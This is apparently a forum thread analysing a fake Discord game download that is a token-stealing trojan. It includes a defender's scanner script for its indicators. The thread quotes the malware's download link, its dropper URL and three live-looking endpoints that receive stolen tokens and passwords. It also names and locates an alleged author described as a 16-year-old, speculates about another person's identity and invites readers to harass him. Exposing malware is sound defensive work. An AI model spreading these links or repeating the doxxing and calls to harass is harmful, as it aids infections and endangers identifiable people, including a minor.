"Honest feedback on a game I made" TROJAN

Popup - http://cdn.discordapp.com/attachments/911128608729358346/911558951152255016/Sniper_Attack.exe

VirusTotal - File - e5994d21ed90e936d1fc54a6d12ee45da88ed4e83542be4790011cb969d7087f

Program contains the HEUR:Trojan-PSW.Win32.Disco.gen trojan and functions as a Discord tokener.

Yay, there’s another contestant in the “You think your skidded malware can hack everybody” show?

It’s another PrimeFA sample AFAIK. I am too poor to do proper dynamic analysis on my HW and from the looks of it it’s skidded anyways. Shame on AVs for not even detecting a literally open-source skidded grabber. Boo!
Anyways yes, uploading ALL of their stuff to VT, just because they told me not to.

Infection detection:
HTTP: http://primefa.xyz/injection sample grabs the grabber from here (to avoid detection) → exe literally just a dropper
For now it drops the credentials to https://p9iprsfdr7.execute-api.us-east-2.amazonaws.com/default/EmailChanged?token=${o}&auth=${auth}&psd=${psw}&email={email} and
https://1m3bmndg3i.execute-api.us-east-2.amazonaws.com/default/Logged?token=${o}&auth=${auth}&psd=${psw} and
https://sd8bzuhwv6.execute-api.us-east-2.amazonaws.com/default/PassChanged?token=${o}&auth=${auth}&psd=${psw}&oldpsd=${e}
idk what the fuck the auth parameter is supposed to be but maybe it’s the string “__AUTH__”

The devs are cocky enough to leave you an invite to a Discord server when you attempt to connect to these servers if your packets are too sus.

This server conversation speaks for itself:

Hmm love my [[Premium]] (education purpose) skidded malware

yah it’s a resell of an open-source trash grabber and even the original author hates this guy.


Looks like this guy got dropped before I even got here so most info is stale as bread. But please give this benchod a run for the buck :slight_smile:

INFO:
[email protected]
[email protected]
Nithish#5099 - NithishCodez
x.com and NithishCodez (Nithish Pravin) · GitHub
https://nithishpravin.xyz/ - Nithish Pravin, 16yo, Chennai, Tamil Nadu - likely a persona
https://www.youtube.com/channel/UC_M6GWo7ZcmUVzssGi7i5Iw

SPECULATION: might be an alt of khalby78 and I have researched that thoroughly (and archived EVERYTHING in case I am right) but there’s a possibility that this acc is a decoy designed to hurt the lad (who seems to be living quite a public life on the Internet) so I will leave that up to when evidence linking the two properly emerges.

P. S. If you wanna go bother the actual devs of this original skidware, go to go6 [closed]
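Defender-side follow-up to the "Infection detection" notes above, as an added example that is not part of the original post: a small scanner that flags the second-stage fetch and the three exfil requests in a proxy log. The log format, client IPs and parameter values are constructed; the host pattern is my assumption that generalizes the three API Gateway IDs quoted in the post.

```python
"""Flag proxy-log requests matching the grabber's fetch and exfil URLs from the thread."""
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the thread: the second-stage fetch and the three
# exfil endpoints (API Gateway hosts, /default/<Event> paths, token/auth/psd params).
DROPPER_FETCH = ("primefa.xyz", "/injection")
# Assumption: the 10-char API Gateway ID pattern generalizes the three hosts seen.
EXFIL_HOST_RE = re.compile(r"^[a-z0-9]{10}\.execute-api\.us-east-2\.amazonaws\.com$")
EXFIL_PATHS = {"/default/Logged", "/default/EmailChanged", "/default/PassChanged"}
EXFIL_PARAMS = {"token", "auth", "psd"}

# Constructed sample lines in a minimal "client method url status" format.
SAMPLE_LOG = """\
10.0.0.12 GET http://primefa.xyz/injection 200
10.0.0.12 GET https://1m3bmndg3i.execute-api.us-east-2.amazonaws.com/default/Logged?token=REDACTED&auth=__AUTH__&psd=REDACTED 200
10.0.0.12 GET https://sd8bzuhwv6.execute-api.us-east-2.amazonaws.com/default/PassChanged?token=REDACTED&auth=__AUTH__&psd=x&oldpsd=y 200
10.0.0.20 GET https://abcdefghij.execute-api.us-east-2.amazonaws.com/default/Health 200
10.0.0.20 GET https://discord.com/api/v9/users/@me 200
"""

def classify_url(url):
    """Return 'dropper_fetch', 'token_exfil' or None for one URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if (host, parts.path) == DROPPER_FETCH:
        return "dropper_fetch"
    params = set(parse_qs(parts.query).keys())
    # Only a benign-looking API Gateway host is not enough: path and the
    # credential parameters must match too, to avoid flagging unrelated APIs.
    if (EXFIL_HOST_RE.match(host) and parts.path in EXFIL_PATHS
            and EXFIL_PARAMS <= params):
        return "token_exfil"
    return None

def scan_log(text):
    """Return (client, verdict, path) for each suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        client, url = fields[0], fields[2]
        verdict = classify_url(url)
        if verdict:
            hits.append((client, verdict, urlsplit(url).path))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```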

Still care about this? Even as of today it’s still going around and I’m trying to write up a script to spam their APIs with junk tokens. If you wanna offer any help it would be cool.


Yo kekami pls send me this guy’s Discord ID, he frauded me as well